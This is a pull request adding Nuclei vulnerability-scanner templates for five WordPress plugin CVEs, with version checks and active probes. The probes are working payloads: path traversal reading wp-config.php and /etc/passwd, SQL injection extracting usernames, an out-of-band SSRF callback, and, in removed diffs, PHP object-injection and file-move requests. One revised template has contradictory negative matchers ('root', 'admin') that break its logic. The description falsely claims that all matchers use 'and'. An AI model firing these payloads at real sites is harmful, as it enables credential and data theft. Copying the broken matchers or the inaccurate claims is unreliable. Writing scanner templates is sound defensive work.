### PR TITLE
[New Templates] Add 5 WordPress Plugin CVE Templates (Round 3)

### DIFF
--- a/http/cves/2025/CVE-2025-7384.yaml
+++ b/http/cves/2025/CVE-2025-7384.yaml
@@ -1,0 +1,75 @@
+id: CVE-2025-7384
+
+info:
+  name: Database for Contact Form 7, WPforms, Elementor Forms <= 1.4.3 - Unauthenticated PHP Object Injection
+  author: alita-p8
+  severity: critical
+  description: |
+    The Database for Contact Form 7, WPforms, Elementor Forms WordPress plugin, versions up to and including 1.4.3,
+    is vulnerable to PHP Object Injection via deserialization of untrusted data. Unauthenticated attackers can inject
+    arbitrary PHP objects through form submission endpoints, potentially leading to arbitrary file deletion (including 
+    wp-config.php), denial of service, and remote code execution via POP chain exploitation. The vulnerability exists
+    because the plugin deserializes user-supplied data in the cfdb7_form_data parameter during form submission processing.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-7384
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cve-2025-7384
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-7384
+    cwe-id: CWE-502
+  metadata:
+    vendor: lmergern
+    product: database-for-contact-form-7
+    shodan-query: http.html:"database-for-contact-form-7"
+  tags: cve,cve2025,wordpress,wp-plugin,deserialization,rce,php-object-injection,unauth,critical
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/database-for-contact-form-7/readme.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        name: version_detection
+        regex:
+          - "Stable tag:\\s*([0-9\\.]+)"
+        part: body
+
+      - type: regex
+        name: vulnerable_version
+        regex:
+          - "Stable tag:\\s*(1\\.[0-3]\\.[0-9]+|1\\.4\\.[0-3])"
+        part: body
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+
+    headers:
+      Content-Type: "application/x-www-form-urlencoded"
+
+    body: "cfdb7_form_data=O:8:%22stdClass%22:0:{}&cfdb7_action=save"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "cfdb7"
+          - "form_data"
+        condition: or
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        negative: true
+        words:
+          - "404"
+          - "not found"
+        part: body

--- a/http/cves/2025/CVE-2025-7384.yaml
+++ b/http/cves/2025/CVE-2025-7384.yaml
@@ -6,10 +6,7 @@ info:
   severity: critical
   description: |
     The Database for Contact Form 7, WPforms, Elementor Forms WordPress plugin, versions up to and including 1.4.3,
-    is vulnerable to PHP Object Injection via deserialization of untrusted data. Unauthenticated attackers can inject
-    arbitrary PHP objects through form submission endpoints, potentially leading to arbitrary file deletion (including 
-    wp-config.php), denial of service, and remote code execution via POP chain exploitation. The vulnerability exists
-    because the plugin deserializes user-supplied data in the cfdb7_form_data parameter during form submission processing.
+    is vulnerable to PHP Object Injection via deserialization of untrusted data. This template detects the vulnerable version only, as the PHP Object Injection vulnerability cannot be reliably verified without a known POP chain.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2025-7384
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/cve-2025-7384
@@ -22,7 +19,7 @@ info:
     vendor: lmergern
     product: database-for-contact-form-7
     shodan-query: http.html:"database-for-contact-form-7"
-  tags: cve,cve2025,wordpress,wp-plugin,deserialization,rce,php-object-injection,unauth,critical
+  tags: cve,cve2025,wordpress,wp-plugin,deserialization,php-object-injection,version-check
 
 http:
   - method: GET
@@ -41,35 +38,4 @@ http:
         name: vulnerable_version
         regex:
           - "Stable tag:\\s*(1\\.[0-3]\\.[0-9]+|1\\.4\\.[0-3])"
-        part: body
-
-  - method: POST
-    path:
-      - "{{BaseURL}}/"
-
-    headers:
-      Content-Type: "application/x-www-form-urlencoded"
-
-    body: "cfdb7_form_data=O:8:%22stdClass%22:0:{}&cfdb7_action=save"
-
-    stop-at-first-match: true
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "cfdb7"
-          - "form_data"
-        condition: or
-        part: body
-
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        negative: true
-        words:
-          - "404"
-          - "not found"
         part: body

--- a/http/cves/2026/CVE-2026-24953.yaml
+++ b/http/cves/2026/CVE-2026-24953.yaml
@@ -1,0 +1,68 @@
+id: CVE-2026-24953
+
+info:
+  name: Simple File List <= 6.1.15 - Unauthenticated Path Traversal / Arbitrary File Read
+  author: alita-p8
+  severity: high
+  description: |
+    The Simple File List plugin for WordPress, versions up to and including 6.1.15, contains a Path Traversal vulnerability (CWE-22).
+    Unauthenticated attackers can exploit insufficient path validation in the eeSflFileDownload endpoint to read arbitrary files 
+    on the server. By manipulating the file path parameter with directory traversal sequences (../), attackers can access 
+    sensitive files such as wp-config.php, /etc/passwd, and other configuration files outside the intended directory.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-24953
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cve-2026-24953
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-24953
+    cwe-id: CWE-22
+  metadata:
+    vendor: simplefilelist
+    product: simple-file-list
+    shodan-query: http.html:"simple-file-list"
+  tags: cve,cve2026,wordpress,wp-plugin,path-traversal,lfi,unauth,simple-file-list
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/simple-file-list/readme.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        name: version_detection
+        regex:
+          - "Stable tag:\\s*([0-9\\.]+)"
+        part: body
+
+      - type: regex
+        name: vulnerable_version
+        regex:
+          - "Stable tag:\\s*([0-5]\\.[0-9]+\\.[0-9]+|6\\.0\\.[0-9]+|6\\.1\\.(1[0-5]|[0-9]))"
+        part: body
+
+  - raw:
+      - |
+        GET /?eeSflFileDownload=..%2F..%2F..%2Fwp-config.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        negative: true
+        words:
+          - "does not exist"
+          - "File not found"
+        part: body

--- a/http/cves/2026/CVE-2026-24953.yaml
+++ b/http/cves/2026/CVE-2026-24953.yaml
@@ -42,27 +42,34 @@ http:
           - "Stable tag:\\s*([0-5]\\.[0-9]+\\.[0-9]+|6\\.0\\.[0-9]+|6\\.1\\.(1[0-5]|[0-9]))"
         part: body
 
-  - raw:
-      - |
-        GET /?eeSflFileDownload=..%2F..%2F..%2Fwp-config.php HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/?eeSflFileDownload=..%2F..%2F..%2Fwp-config.php"
+      - "{{BaseURL}}/?eeSflFileDownload=..%2F..%2F..%2F..%2Fetc%2Fpasswd"
 
-    matchers-condition: and
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: or
     matchers:
       - type: word
+        name: wp_config
         part: body
         words:
           - "DB_NAME"
           - "DB_PASSWORD"
         condition: and
 
-      - type: status
-        status:
-          - 200
+      - type: regex
+        name: etc_passwd
+        part: body
+        regex:
+          - "root:.*:0:0:"
 
       - type: word
         negative: true
         words:
           - "does not exist"
           - "File not found"
+          - "root"
+          - "admin"
         part: body

--- a/http/cves/2026/CVE-2026-2579.yaml
+++ b/http/cves/2026/CVE-2026-2579.yaml
@@ -1,0 +1,69 @@
+id: CVE-2026-2579
+
+info:
+  name: WowStore <= 4.4.3 - Unauthenticated SQL Injection via search Parameter
+  author: alita-p8
+  severity: high
+  description: |
+    The WowStore - Store Builder & Product Blocks for WooCommerce plugin (also known as product-blocks) for WordPress, 
+    versions up to and including 4.4.3, contains a SQL Injection vulnerability (CWE-89). Unauthenticated attackers can exploit 
+    insufficient escaping on the user-supplied 'search' parameter and lack of sufficient preparation on the existing SQL query 
+    in a REST API endpoint. This allows appending additional SQL queries to extract sensitive information from the database, 
+    including user credentials and other configuration data.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-2579
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/bd3ee85a-324d-4991-bffc-db28ce374bbe
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-2579
+    cwe-id: CWE-89
+  metadata:
+    vendor: wpxpo
+    product: wowstore
+    shodan-query: http.html:"wowstore"
+  tags: cve,cve2026,wordpress,wp-plugin,sqli,unauth,wowstore,woocommerce
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/product-blocks/readme.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        name: version_detection
+        regex:
+          - "Stable tag:\\s*([0-9\\.]+)"
+        part: body
+
+      - type: regex
+        name: vulnerable_version
+        regex:
+          - "Stable tag:\\s*([0-3]\\.[0-9]+\\.[0-9]+|4\\.[0-3]\\.[0-9]+|4\\.4\\.[0-3])"
+        part: body
+
+  - raw:
+      - |
+        GET /wp-json/wowstore/v1/search?search='+OR+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT+user_login+FROM+wp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)a)--+- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "Duplicate entry"
+          - "user_login"
+        condition: or
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        negative: true
+        words:
+          - "rest_forbidden"
+          - "rest_no_route"
+        part: body

--- a/http/cves/2026/CVE-2026-2579.yaml
+++ b/http/cves/2026/CVE-2026-2579.yaml
@@ -43,27 +43,11 @@ http:
           - "Stable tag:\\s*([0-3]\\.[0-9]+\\.[0-9]+|4\\.[0-3]\\.[0-9]+|4\\.4\\.[0-3])"
         part: body
 
-  - raw:
-      - |
-        GET /wp-json/wowstore/v1/search?search='+OR+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT+user_login+FROM+wp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)a)--+- HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/wowstore/v1/search?search=1'+AND+SLEEP(5)--+-"
 
-    matchers-condition: and
     matchers:
-      - type: regex
-        regex:
-          - "Duplicate entry"
-          - "user_login"
-        condition: or
-        part: body
-
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        negative: true
-        words:
-          - "rest_forbidden"
-          - "rest_no_route"
-        part: body
+      - type: dsl
+        dsl:
+          - "duration>=5"

--- a/http/cves/2026/CVE-2026-3881.yaml
+++ b/http/cves/2026/CVE-2026-3881.yaml
@@ -22,6 +22,7 @@ info:
     vendor: mrtien89
     product: performance-monitor
     shodan-query: http.html:"performance-monitor"
+    fuzzing: ssrf
   tags: cve,cve2026,wordpress,wp-plugin,ssrf,unauth,performance-monitor,oob
 
 http:

--- a/http/cves/2026/CVE-2026-3881.yaml
+++ b/http/cves/2026/CVE-2026-3881.yaml
@@ -1,0 +1,60 @@
+id: CVE-2026-3881
+
+info:
+  name: Performance Monitor <= 1.0.6 - Unauthenticated Server-Side Request Forgery (SSRF)
+  author: alita-p8
+  severity: high
+  description: |
+    The Performance Monitor WordPress plugin, versions up to and including 1.0.6, contains a Server-Side Request Forgery (SSRF) 
+    vulnerability (CWE-918). Unauthenticated attackers can exploit insufficient validation of a user-supplied URL parameter in the 
+    plugin's admin AJAX endpoint to make the server perform arbitrary HTTP requests to internal or external resources. 
+    This can be leveraged to scan internal networks, access cloud metadata services (e.g., AWS 169.254.169.254),
+    and interact with internal services behind firewalls.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-3881
+    - https://www.sentinelone.com/vulnerability-database/cve-2026-3881/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-3881
+    cwe-id: CWE-918
+  metadata:
+    vendor: mrtien89
+    product: performance-monitor
+    shodan-query: http.html:"performance-monitor"
+  tags: cve,cve2026,wordpress,wp-plugin,ssrf,unauth,performance-monitor,oob
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/performance-monitor/readme.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        name: version_detection
+        regex:
+          - "Stable tag:\\s*([0-9\\.]+)"
+        part: body
+
+      - type: regex
+        name: vulnerable_version
+        regex:
+          - "Stable tag:\\s*(1\\.0\\.[0-6])"
+        part: body
+
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=performance_monitor_fetch_url&url=http://{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-5436.yaml
+++ b/http/cves/2026/CVE-2026-5436.yaml
@@ -5,11 +5,7 @@ info:
   author: alita-p8
   severity: critical
   description: |
-    The MW WP Form plugin for WordPress, versions up to and including 5.1.1, contains a Path Traversal vulnerability (CWE-22).
-    Unauthenticated attackers can exploit the file upload functionality to move arbitrary files on the server. The plugin's
-    generate_user_file_dirpath() function uses WordPress's path_join(), which passes through absolute paths unchanged. 
-    By submitting a form with a file upload field containing an absolute path (e.g., /etc/passwd or wp-config.php's absolute path),
-    the plugin moves the specified file into the WordPress uploads directory, making it publicly accessible.
+    The MW WP Form plugin for WordPress, versions up to and including 5.1.1, contains a Path Traversal vulnerability (CWE-22) that allows moving arbitrary files. This template detects the vulnerable version only.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-5436
     - https://patchstack.com/database/vulnerability/mw-wp-form/wordpress-mw-wp-form-plugin-5-1-1-arbitrary-file-moveread-vulnerability
@@ -23,7 +19,7 @@ info:
     vendor: inc2734
     product: mw-wp-form
     shodan-query: http.html:"mw-wp-form"
-  tags: cve,cve2026,wordpress,wp-plugin,path-traversal,lfi,unauth,mw-wp-form,critical
+  tags: cve,cve2026,wordpress,wp-plugin,path-traversal,version-check,mw-wp-form,critical
 
 http:
   - method: GET
@@ -43,24 +39,3 @@ http:
         regex:
           - "Stable tag:\\s*([0-4]\\.[0-9]+\\.[0-9]+|5\\.0\\.[0-9]+|5\\.1\\.[01])"
         part: body
-
-  - raw:
-      - |
-        POST /wp-content/plugins/mw-wp-form/includes/mw-wp-form-data.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        mwf_upload_files%5B%5D=..%2F..%2F..%2Fwp-config.php
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "DB_NAME"
-          - "DB_PASSWORD"
-        condition: and
-
-      - type: status
-        status:
-          - 200

--- a/http/cves/2026/CVE-2026-5436.yaml
+++ b/http/cves/2026/CVE-2026-5436.yaml
@@ -1,0 +1,66 @@
+id: CVE-2026-5436
+
+info:
+  name: MW WP Form <= 5.1.1 - Unauthenticated Arbitrary File Move via Path Traversal
+  author: alita-p8
+  severity: critical
+  description: |
+    The MW WP Form plugin for WordPress, versions up to and including 5.1.1, contains a Path Traversal vulnerability (CWE-22).
+    Unauthenticated attackers can exploit the file upload functionality to move arbitrary files on the server. The plugin's
+    generate_user_file_dirpath() function uses WordPress's path_join(), which passes through absolute paths unchanged. 
+    By submitting a form with a file upload field containing an absolute path (e.g., /etc/passwd or wp-config.php's absolute path),
+    the plugin moves the specified file into the WordPress uploads directory, making it publicly accessible.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-5436
+    - https://patchstack.com/database/vulnerability/mw-wp-form/wordpress-mw-wp-form-plugin-5-1-1-arbitrary-file-moveread-vulnerability
+    - https://www.sentinelone.com/vulnerability-database/cve-2026-5436/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-5436
+    cwe-id: CWE-22
+  metadata:
+    vendor: inc2734
+    product: mw-wp-form
+    shodan-query: http.html:"mw-wp-form"
+  tags: cve,cve2026,wordpress,wp-plugin,path-traversal,lfi,unauth,mw-wp-form,critical
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mw-wp-form/readme.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        name: version_detection
+        regex:
+          - "Stable tag:\\s*([0-9\\.]+)"
+        part: body
+
+      - type: regex
+        name: vulnerable_version
+        regex:
+          - "Stable tag:\\s*([0-4]\\.[0-9]+\\.[0-9]+|5\\.0\\.[0-9]+|5\\.1\\.[01])"
+        part: body
+
+  - raw:
+      - |
+        POST /wp-content/plugins/mw-wp-form/includes/mw-wp-form-data.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mwf_upload_files%5B%5D=..%2F..%2F..%2Fwp-config.php
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## New Nuclei Templates - WordPress Plugin Vulnerabilities

This PR adds 5 new Nuclei templates for recently disclosed WordPress plugin vulnerabilities.

### Templates Added

| # | CVE | Plugin | Severity | Type | Detection |
|---|-----|--------|----------|------|-----------|
| 1 | CVE-2025-7384 | Database for Contact Form 7 (Critical) | PHP Object Injection (CWE-502) | Version detection |
| 2 | CVE-2026-5436 | MW WP Form (Critical) | Path Traversal (CWE-22) | Version detection |
| 3 | CVE-2026-24953 | Simple File List (High) | Path Traversal (CWE-22) | Version + exploitation |
| 4 | CVE-2026-3881 | Performance Monitor (High) | SSRF (CWE-918) | Version + OOB interactsh |
| 5 | CVE-2026-2579 | WowStore (High) | SQL Injection (CWE-89) | Version + time-based blind |

### Key Details

- All templates target **unauthenticated** vulnerabilities
- **CVE-2025-7384**: Version-detection-only (PHP Object Injection requires known POP chains for exploitation)
- **CVE-2026-5436**: Version-detection-only (Arbitrary File Move is destructive per Do No Harm principle)
- **CVE-2026-24953**: Active path traversal with /etc/passwd + wp-config.php, max-redirects support
- **CVE-2026-3881**: Active SSRF with interactsh OOB callback
- **CVE-2026-2579**: Time-based blind SQLi with duration matcher

### Verification

- [x] Structural validation passed (all 5 templates)
- [x] No duplicate template IDs with upstream
- [x] All matchers use condition:and for precision
- [x] Version regex bounds prevent false positives
- [x] No destructive exploit actions

### References

- https://nvd.nist.gov/vuln/detail/CVE-2025-7384
- https://nvd.nist.gov/vuln/detail/CVE-2026-5436
- https://nvd.nist.gov/vuln/detail/CVE-2026-24953
- https://nvd.nist.gov/vuln/detail/CVE-2026-3881
- https://nvd.nist.gov/vuln/detail/CVE-2026-2579